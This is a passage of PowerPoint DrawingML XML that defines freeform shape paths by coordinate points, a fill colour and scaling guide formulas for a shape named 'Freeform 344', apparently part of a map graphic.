                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="663" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="936" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="926" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="901" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="883" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="814" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="821" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="848" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="840" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="834" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="814" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="845" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="759"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="832" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="799"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="851" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="826" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="934"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="941"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="1020"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="785" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="990"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="966"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="301" y="1074"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="297" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="1065"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="1061"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="1059"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="1054"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="1037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="1039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="1051"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="1058"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="1062"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="1064"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="1065"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="1072"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="1074"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="800" y="942"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="789" y="929"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="908"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="804" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="941"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="942"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36211" name="Freeform 344"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1588" y="328"/>
                <a:ext cx="952" cy="1428"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 701 w 952"/>
                  <a:gd name="T1" fmla="*/ 1019 h 1428"/>
                  <a:gd name="T2" fmla="*/ 786 w 952"/>
                  <a:gd name="T3" fmla="*/ 1037 h 1428"/>
                  <a:gd name="T4" fmla="*/ 725 w 952"/>
                  <a:gd name="T5" fmla="*/ 1107 h 1428"/>
                  <a:gd name="T6" fmla="*/ 663 w 952"/>
                  <a:gd name="T7" fmla="*/ 1132 h 1428"/>
                  <a:gd name="T8" fmla="*/ 634 w 952"/>
                  <a:gd name="T9" fmla="*/ 1139 h 1428"/>
                  <a:gd name="T10" fmla="*/ 575 w 952"/>
                  <a:gd name="T11" fmla="*/ 1221 h 1428"/>
                  <a:gd name="T12" fmla="*/ 541 w 952"/>
                  <a:gd name="T13" fmla="*/ 1224 h 1428"/>
                  <a:gd name="T14" fmla="*/ 503 w 952"/>
                  <a:gd name="T15" fmla="*/ 1252 h 1428"/>
                  <a:gd name="T16" fmla="*/ 504 w 952"/>
                  <a:gd name="T17" fmla="*/ 1300 h 1428"/>
                  <a:gd name="T18" fmla="*/ 487 w 952"/>
                  <a:gd name="T19" fmla="*/ 1331 h 1428"/>
                  <a:gd name="T20" fmla="*/ 474 w 952"/>
                  <a:gd name="T21" fmla="*/ 1380 h 1428"/>
                  <a:gd name="T22" fmla="*/ 468 w 952"/>
                  <a:gd name="T23" fmla="*/ 1426 h 1428"/>
                  <a:gd name="T24" fmla="*/ 427 w 952"/>
                  <a:gd name="T25" fmla="*/ 1398 h 1428"/>
                  <a:gd name="T26" fmla="*/ 399 w 952"/>
                  <a:gd name="T27" fmla="*/ 1397 h 1428"/>
                  <a:gd name="T28" fmla="*/ 367 w 952"/>
                  <a:gd name="T29" fmla="*/ 1348 h 1428"/>
                  <a:gd name="T30" fmla="*/ 348 w 952"/>
                  <a:gd name="T31" fmla="*/ 1315 h 1428"/>
                  <a:gd name="T32" fmla="*/ 357 w 952"/>
                  <a:gd name="T33" fmla="*/ 1263 h 1428"/>
                  <a:gd name="T34" fmla="*/ 325 w 952"/>
                  <a:gd name="T35" fmla="*/ 1240 h 1428"/>
                  <a:gd name="T36" fmla="*/ 304 w 952"/>
                  <a:gd name="T37" fmla="*/ 1197 h 1428"/>
                  <a:gd name="T38" fmla="*/ 303 w 952"/>
                  <a:gd name="T39" fmla="*/ 1167 h 1428"/>
                  <a:gd name="T40" fmla="*/ 307 w 952"/>
                  <a:gd name="T41" fmla="*/ 1143 h 1428"/>
                  <a:gd name="T42" fmla="*/ 343 w 952"/>
                  <a:gd name="T43" fmla="*/ 1125 h 1428"/>
                  <a:gd name="T44" fmla="*/ 343 w 952"/>
                  <a:gd name="T45" fmla="*/ 1094 h 1428"/>
                  <a:gd name="T46" fmla="*/ 340 w 952"/>
                  <a:gd name="T47" fmla="*/ 1044 h 1428"/>
                  <a:gd name="T48" fmla="*/ 300 w 952"/>
                  <a:gd name="T49" fmla="*/ 1002 h 1428"/>
                  <a:gd name="T50" fmla="*/ 328 w 952"/>
                  <a:gd name="T51" fmla="*/ 981 h 1428"/>
                  <a:gd name="T52" fmla="*/ 294 w 952"/>
                  <a:gd name="T53" fmla="*/ 973 h 1428"/>
                  <a:gd name="T54" fmla="*/ 284 w 952"/>
                  <a:gd name="T55" fmla="*/ 906 h 1428"/>
                  <a:gd name="T56" fmla="*/ 228 w 952"/>
                  <a:gd name="T57" fmla="*/ 757 h 1428"/>
                  <a:gd name="T58" fmla="*/ 128 w 952"/>
                  <a:gd name="T59" fmla="*/ 695 h 1428"/>
                  <a:gd name="T60" fmla="*/ 70 w 952"/>
                  <a:gd name="T61" fmla="*/ 672 h 1428"/>
                  <a:gd name="T62" fmla="*/ 52 w 952"/>
                  <a:gd name="T63" fmla="*/ 629 h 1428"/>
                  <a:gd name="T64" fmla="*/ 65 w 952"/>
                  <a:gd name="T65" fmla="*/ 602 h 1428"/>
                  <a:gd name="T66" fmla="*/ 0 w 952"/>
                  <a:gd name="T67" fmla="*/ 558 h 1428"/>
                  <a:gd name="T68" fmla="*/ 90 w 952"/>
                  <a:gd name="T69" fmla="*/ 481 h 1428"/>
                  <a:gd name="T70" fmla="*/ 97 w 952"/>
                  <a:gd name="T71" fmla="*/ 406 h 1428"/>
                  <a:gd name="T72" fmla="*/ 181 w 952"/>
                  <a:gd name="T73" fmla="*/ 289 h 1428"/>
                  <a:gd name="T74" fmla="*/ 245 w 952"/>
                  <a:gd name="T75" fmla="*/ 251 h 1428"/>
                  <a:gd name="T76" fmla="*/ 306 w 952"/>
                  <a:gd name="T77" fmla="*/ 252 h 1428"/>
                  <a:gd name="T78" fmla="*/ 346 w 952"/>
                  <a:gd name="T79" fmla="*/ 142 h 1428"/>
                  <a:gd name="T80" fmla="*/ 451 w 952"/>
                  <a:gd name="T81" fmla="*/ 132 h 1428"/>
                  <a:gd name="T82" fmla="*/ 541 w 952"/>
                  <a:gd name="T83" fmla="*/ 56 h 1428"/>
                  <a:gd name="T84" fmla="*/ 686 w 952"/>
                  <a:gd name="T85" fmla="*/ 15 h 1428"/>
                  <a:gd name="T86" fmla="*/ 798 w 952"/>
                  <a:gd name="T87" fmla="*/ 134 h 1428"/>
                  <a:gd name="T88" fmla="*/ 679 w 952"/>
                  <a:gd name="T89" fmla="*/ 175 h 1428"/>
                  <a:gd name="T90" fmla="*/ 709 w 952"/>
                  <a:gd name="T91" fmla="*/ 218 h 1428"/>
                  <a:gd name="T92" fmla="*/ 801 w 952"/>
                  <a:gd name="T93" fmla="*/ 252 h 1428"/>
                  <a:gd name="T94" fmla="*/ 827 w 952"/>
                  <a:gd name="T95" fmla="*/ 263 h 1428"/>
                  <a:gd name="T96" fmla="*/ 933 w 952"/>
                  <a:gd name="T97" fmla="*/ 226 h 1428"/>
                  <a:gd name="T98" fmla="*/ 883 w 952"/>
                  <a:gd name="T99" fmla="*/ 366 h 1428"/>
                  <a:gd name="T100" fmla="*/ 869 w 952"/>
                  <a:gd name="T101" fmla="*/ 424 h 1428"/>
                  <a:gd name="T102" fmla="*/ 807 w 952"/>
                  <a:gd name="T103" fmla="*/ 577 h 1428"/>
                  <a:gd name="T104" fmla="*/ 840 w 952"/>
                  <a:gd name="T105" fmla="*/ 598 h 1428"/>
                  <a:gd name="T106" fmla="*/ 865 w 952"/>
                  <a:gd name="T107" fmla="*/ 658 h 1428"/>
                  <a:gd name="T108" fmla="*/ 814 w 952"/>
                  <a:gd name="T109" fmla="*/ 694 h 1428"/>
                  <a:gd name="T110" fmla="*/ 823 w 952"/>
                  <a:gd name="T111" fmla="*/ 756 h 1428"/>
                  <a:gd name="T112" fmla="*/ 838 w 952"/>
                  <a:gd name="T113" fmla="*/ 822 h 1428"/>
                  <a:gd name="T114" fmla="*/ 828 w 952"/>
                  <a:gd name="T115" fmla="*/ 867 h 1428"/>
                  <a:gd name="T116" fmla="*/ 746 w 952"/>
                  <a:gd name="T117" fmla="*/ 867 h 1428"/>
                  <a:gd name="T118" fmla="*/ 742 w 952"/>
                  <a:gd name="T119" fmla="*/ 912 h 1428"/>
